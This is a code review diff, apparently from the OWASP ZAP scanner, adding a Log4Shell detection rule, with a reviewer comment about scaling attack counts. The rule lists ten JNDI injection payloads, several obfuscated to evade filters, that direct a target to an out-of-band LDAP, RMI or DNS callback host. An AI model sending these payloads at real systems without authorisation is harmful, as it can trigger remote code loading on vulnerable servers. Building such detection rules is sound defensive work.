addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/Log4ShellScanRule.java

```diff
@@ -0,0 +1,148 @@
+
+    private static final Logger LOGGER = LogManager.getLogger(Log4ShellScanRule.class);
+    private static final String PREFIX = "ascanalpha.log4shell.";
+    private static final String[] ATTACK_PATTERNS = {
+        "${jndi:ldap://{0}/abc}",
+        "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://{0}}/abc}",
+        "${${::-j}ndi:rmi://{0}}/abc}",
+        "${jndi:rmi://{0}}}",
+        "${${lower:jndi}:${lower:rmi}://{0}}/abc}",
+        "${${lower:${lower:jndi}}:${lower:rmi}://{0}}/abc}",
+        "${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://{0}}/abc}",
+        "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://{0}/abc}",
+        "${jndi:dns://{0}/abc}",
+        "${jndi:${lower:l}${lower:d}a${lower:p}://{0}/abc}"
+    };
+
+    @Override
+    public int getId() {
+        return 40043;
+    }
+
+    @Override
+    public String getName() {
+        return Constant.messages.getString(PREFIX + "name");
+    }
+
+    @Override
+    public boolean targets(TechSet technologies) {
+        return technologies.includesAny(Tech.JAVA);
+    }
+
+    @Override
+    public String getDescription() {
+        return Constant.messages.getString(PREFIX + "desc");
+    }
+
+    @Override
+    public int getCategory() {
+        return Category.MISC;
+    }
+
+    @Override
+    public String getSolution() {
+        return Constant.messages.getString(PREFIX + "soln");
+    }
+
+    @Override
+    public String getReference() {
+        return Constant.messages.getString(PREFIX + "refs");
+    }
+
+    @Override
+    public int getRisk() {
+        return Alert.RISK_HIGH;
+    }
+
+    @Override
+    public Map<String, String> getAlertTags() {
+        Map<String, String> alertTags =
+                new HashMap<>(
+                        CommonAlertTag.toMap(
+                                CommonAlertTag.OWASP_2021_A06_VULN_COMP,
+                                CommonAlertTag.OWASP_2017_A09_VULN_COMP,
+                                CommonAlertTag.WSTG_V42_INPV_11_CODE_INJ));
+        alertTags.put(ExtensionOast.OAST_ALERT_TAG_KEY, ExtensionOast.OAST_ALERT_TAG_VALUE);
+        return alertTags;
+    }
+
+    @Override
+    public int getCweId() {
+        return 117;
+    }
+
+    @Override
+    public int getWascId() {
+        return 20;
+    }
+
+    @Override
+    public void init() {
+        ExtensionOast extOast =
+                Control.getSingleton().getExtensionLoader().getExtension(ExtensionOast.class);
+        if (extOast == null || extOast.getActiveScanOastService() == null) {
+            getParent().pluginSkipped(this, Constant.messages.getString(PREFIX + "skipped"));
+        }
+    }
+
+    @Override
+    public void scan(HttpMessage msg, String param, String value) {
+        try {
+            ExtensionOast extOast =
+                    Control.getSingleton().getExtensionLoader().getExtension(ExtensionOast.class);
+            for (String attackPattern : ATTACK_PATTERNS) {
```

Comment:
We could use a different number of attacks based on the Attack Strength, but thats not a mandatory change for an alpha scan rule :)